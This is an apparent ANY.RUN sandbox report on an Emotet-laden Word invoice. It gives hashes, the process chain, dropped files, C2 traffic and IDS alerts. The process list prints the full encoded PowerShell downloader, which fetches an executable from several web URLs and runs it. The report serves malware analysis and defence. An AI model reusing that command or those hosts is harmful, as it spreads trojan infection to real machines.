analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Copia Fattura.doc

Full analysis: https://app.any.run/tasks/e562a722-fa88-466f-b0cc-4d7e423c4ea3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 08:27:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
evasion
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

2D46AA86A46A424F66E8A72FF975BBDF

SHA1:

BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE

SHA256:

47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA

SSDEEP:

6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 3764)
      • 572.exe (PID: 3056)
      • 572.exe (PID: 3964)
      • easywindow.exe (PID: 2860)
      • easywindow.exe (PID: 3900)
      • 572.exe (PID: 3168)
      • easywindow.exe (PID: 2904)
      • easywindow.exe (PID: 3728)

    • Emotet process was detected

      • 572.exe (PID: 3964)

    • EMOTET was detected

      • easywindow.exe (PID: 3728)

    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3728)

    • Connects to CnC server

      • easywindow.exe (PID: 3728)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2520)

    • Executed via WMI

      • powershell.exe (PID: 2520)

    • Creates files in the user directory

      • powershell.exe (PID: 2520)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2520)
      • 572.exe (PID: 3964)

    • Starts itself from another location

      • 572.exe (PID: 3964)

    • Application launched itself

      • easywindow.exe (PID: 2904)

    • Connects to server without host name

      • easywindow.exe (PID: 3728)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3632)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2520)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Greenholt
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Raynor LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:19 06:46:00
CreateDate: 2019:09:19 06:46:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Fall tan
Keywords: -
Author: Rosina Rowe
Subject: Ergonomic Wooden Car
Title: Triple-buffered New Hampshire
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 572.exe no specs 572.exe no specs 572.exe no specs #EMOTET 572.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3632"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Copia Fattura.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2520powershell -encod JABwADgAMQBUAFkAagBJAEgAPQAnAHoAdQBQADUAUwBVADQAdQAnADsAJABrADQANwBwAHAATQA2AEkAIAA9ACAAJwA1ADcAMgAnADsAJABsADUAMABvAHIAagBZAD0AJwBkADEAaQA5AEUAUABqAEEAJwA7ACQASgBXAFQAcwBtAHMAcgBYAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrADQANwBwAHAATQA2AEkAKwAnAC4AZQB4AGUAJwA7ACQAZABrAEsANAAyADkAPQAnAFQAVgBUAEsAagBGACcAOwAkAEsAbwBaAFoAOQBLADkAdgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASwBiAEwAagBPAEcAcgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAGkAdgBlAG4AdAB1AHIAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAeQBPAHIARQBTAEQALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdAByAHUAYwB0AHUAcgBlAHMALQBtAGEAZABlAC0AZQBhAHMAeQAuAGMAbwAuAHUAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEMAUABtAEIAVABtAHQATwAvAEAAaAB0AHQAcABzADoALwAvAG8AZgBmAHMAaQBkAGUAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHMAZQBrAGkAbABsAGUAcgAvAHgAQwBWAGwAUAB4AEgAWQAvAEAAaAB0AHQAcABzADoALwAvAHAAcgBhAG0AbwBkAGsAdQBtAGEAcgBzAGkAbgBnAGgALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAHAAagBxAF8AdQBvAGcAcQBqADUANwBoADEALQA1ADEAMQA4ADcAMAA0ADIAOQAwAC8AQABoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGsAbgBvAHcAbABlAGQAZwBlAC4AbQB5AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwBpADcAagBlAGEAbwBsADQAbQBfADAAYwBrAGUAMQBxADAAeQAtADcANgAvACcALgAiAHMAYABwAEwAaQBUACIAKAAnAEAAJwApADsAJABDADMAcABzAEEAdgA9ACcAUwBLAFEAUgB6AEMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFcARABoAE0AaQA5AGEAIABpAG4AIAAkAEsAYgBMAGoATwBHAHIAegApAHsAdAByAHkAewAkAEsAbwBaAFoAOQBLADkAdgAuACIARABPAGAAdwBOAEwAbwBgAEEAYABkAEYASQBsAGUAIgAoACQAVwBEAGgATQBpADkAYQAsACAAJABKAFcAVABzAG0AcwByAFgAKQA7ACQAVwBkAFMAOQBqAEEASAByAD0AJwBBAGgAcgBZAFEAWQB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASgBXAFQAcwBtAHMAcgBYACkALgAiAEwAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgAwADEAMQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEoAVwBUAHMAbQBzAHIAWAApADsAJABSAG0ARwB6AFUAOABoAD0AJwBSAE4AVgBpAGEAdQBHAHcAJwA7AGIAcgBlAGEAawA7ACQAQwB2ADkAbwBqAHUAdAA9ACcAdQAzAGoAegAyAEoAaAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAbQBpAGEAXwB0AFEAPQAnAE4AbwBLAGwAaABmAEoANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3764"C:\Users\admin\572.exe" C:\Users\admin\572.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3056"C:\Users\admin\572.exe" C:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3168--fb4ffeeeC:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3964--fb4ffeeeC:\Users\admin\572.exe
572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3900"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3728--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 780
Read events
1 286
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A8F.tmp.cvr
MD5:
SHA256:
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BAA26137.wmfwmf
MD5:0503FA9073CC728BA4C85E51DE992937
SHA256:50BE34B8D632A4C817D1BCEDD1E628BCEC1CA1B725C1340C3830C6D99A37C8A0
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59918165.wmfwmf
MD5:B70BB9F6F44D7896781A5E123A5BCE6B
SHA256:6F946E3E104D36BDC4C6BAC5C6E5E7FD61933A42B104348FCB83EF74FB377446
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C543575D.wmfwmf
MD5:204D836FD505DB3AFD1A1C49AF2BFDC0
SHA256:CDC20E663AEBB947ACE1B0C0CB8C116D0AF2B77755127CF3B5043F42E43D741A
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECBFB7FF.wmfwmf
MD5:0E8445374B10B1E7BDCA33CEF020D4EF
SHA256:B4D249824F7D8C5D11AC43ACEEFC6E91AF7EA5C327ED4935585FC45E36B06A47
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6AC9009.wmfwmf
MD5:BF2AE3979B516EC40C5293EFF0C09851
SHA256:DC00D85E30FA97E02F4285E3F6AE2BD51120E48C7F2B32DB51C11008E299729A
3632WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CD0929FDC6545C244CB285B22558DE27
SHA256:4F0C83A3FE87834B4FE11EE04E1367F736F25C3034A92327199430EDC9366CAD
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCC01DBB.wmfwmf
MD5:48B036286BEF39F73081E1128B7E4DF3
SHA256:DD947EE606C34891E9ED4BD281F6A47D84295F4147E5B6FF32A04FC4BD6716B3
3632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:DACA5A5ABD9803CFB09FA44C7B26CCC1
SHA256:31CBDCCAFBD9719E5302070CAE16D8320251B21AF3D537A15B963505A1AF3F42
3632WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83843A81.wmfwmf
MD5:5636F5A95FE29BEE903669E7F9CE9A3F
SHA256:10489CCEFDE7121CB01CDB0AA804BA1A5DA04DBB1B95EE0E9586C5105D92913C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
170
DNS requests
147
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3728
easywindow.exe
POST
190.18.146.70:80
http://190.18.146.70/pdf/
AR
malicious
3728
easywindow.exe
POST
200
187.147.50.167:8080
http://187.147.50.167:8080/badge/
MX
binary
148 b
malicious
3728
easywindow.exe
GET
200
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
text
12 b
malicious
3728
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/arizona/ban/
US
binary
1.53 Mb
malicious
3728
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/ban/enable/ringin/merge/
US
binary
178 Kb
malicious
3728
easywindow.exe
POST
200
187.147.50.167:8080
http://187.147.50.167:8080/loadan/attrib/
MX
binary
1.38 Mb
malicious
3728
easywindow.exe
GET
200
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
text
12 b
malicious
3728
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/json/enable/ringin/merge/
US
binary
3.39 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3728
easywindow.exe
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
3728
easywindow.exe
72.12.114.84:110
mail.198da.com
Hill Country Telephone Cooperative, Inc.
US
unknown
3728
easywindow.exe
187.147.50.167:8080
Uninet S.A. de C.V.
MX
malicious
2520
powershell.exe
104.28.18.13:443
aniventure.co.uk
Cloudflare Inc
US
shared
3728
easywindow.exe
81.169.145.131:587
pop3.strato.de
Strato AG
DE
unknown
3728
easywindow.exe
69.43.168.232:443
Castle Access Inc
US
malicious
3728
easywindow.exe
89.248.110.185:110
mail.motorgomez.com
Cloud Builders SA
ES
unknown
3728
easywindow.exe
76.12.236.183:110
win-mail18.hostmanagement.net
HostMySite
US
unknown
3728
easywindow.exe
173.201.193.97:995
pop.secureserver.net
GoDaddy.com, LLC
US
unknown
3728
easywindow.exe
213.33.98.149:995
securemail.a1.net
A1 Telekom Austria AG
AT
unknown

DNS requests

Domain
IP
Reputation
aniventure.co.uk
  • 104.28.18.13
  • 104.28.19.13
malicious
pop.secureserver.net
  • 173.201.193.97
  • 68.178.252.117
  • 173.201.192.158
  • 173.201.192.129
  • 97.74.135.10
  • 72.167.218.138
  • 173.201.193.129
  • 97.74.135.143
shared
pop3.strato.de
  • 81.169.145.131
unknown
pp.oatalcm
unknown
mail.crezenta.com
  • 86.109.162.144
unknown
bces.o
unknown
mail.198da.com
  • 72.12.114.84
unknown
mail.casintra.com
  • 217.76.128.68
unknown
ia.oo.ou
unknown
mail.motorgomez.com
  • 89.248.110.185
unknown

Threats

PID
Process
Class
Message
3728
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3728
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3728
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3728
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3728
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3728
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3728
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3728
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
A Network Trojan was detected
AV INFO Observed DNS Query to Suspicious Domain *[.]o
3728
easywindow.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
11 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Copia Fattura.doc